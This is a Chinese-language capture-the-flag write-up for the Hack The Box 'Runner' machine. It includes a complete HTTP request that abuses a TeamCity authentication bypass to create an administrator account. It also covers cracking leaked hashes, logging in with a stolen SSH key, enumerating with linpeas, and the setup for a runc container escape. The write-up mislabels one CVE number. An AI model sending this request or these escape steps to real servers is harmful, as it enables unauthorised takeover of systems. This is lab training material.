Hack The Box Runner

Hack The Box Runner

我个人还是觉得这个靶场不错，比较简单

端口收集

开放80，8000，22端口
将 10.129.230.247 runner.htb 放入hosts中

#写入一个.bat文件可以快速打开hosts
@echo off
set hostsFile=%SystemRoot%\System32\drivers\etc\hosts
if exist "%hostsFile%" (
    start notepad "%hostsFile%"
) else (
    echo Hosts file not found!
)

目录扫描

目录扫描没发现啥有用的目录

子域名扫描

子域名扫描发现了teamcity.runner.htb
加到hosts中

CVE-2024-27198 复现

2024年2月 Jetbrain官方披露CVE-2024-23917 TeamCity 认证绕过漏洞，攻击者可构造恶意请求绕过权限认证，并利用相关功能执行任意代码，控制服务器。
影响版本：

JetBrains TeamCity < 2023.11.3

在这里我我们添加了一个admin123的用户密码是admin123

POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: teamcity.runner.htb
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: tenantId=default; TCSESSIONID=42A39DB0C38442812878BFE9737E3EFB; __test=1
Content-Type: application/json
Connection: close
Content-Length: 146

{"username": "admin123", "password": "admin1232", "email": "ayngm@akun.com","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

具体的漏洞分析可以看
https://mp.weixin.qq.com/s/1oCsj6Y_XMQVxsEeq4w82w

进来之后我们要想办法拿到shell

这个是网站的备份，可以在备份中看网站有什么东西，毕竟一切东西文件化嘛

user
config
id_rsa
passwd
password
这些常见的文件可以搜一下看一下有没有啥有用的东西

有一个users 里面存到用户名密码

拿去解密，解密只有matthew和admin123，john没撞到，还是要收集字典啊

这里有一个ssh_keys 里面是id_rsa是某个用户的登录密钥，我们经过尝试是john的

先将id_rsa的权限改为700以防万一

chmod 600 id_rsa

拿到user这里我们没有密码不能提权看看有啥可以利用的

提前下好linux信息收集神器linpeas.sh，本机开启http服务

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

使用

networt 这里发现了一个我们前期没收集到的子域名，我们尝试一下看看有啥
添加到hosts中

CVE-2024-21626 容器逃逸

容器逃逸需要进入后台我们不知道密码只有一个matthew piper123 这个知道我们试试

镜像为teamcity:latest
工作路径为/proc/self/fd/8

如果没有反应可以重启一下就好了

更多内容请关注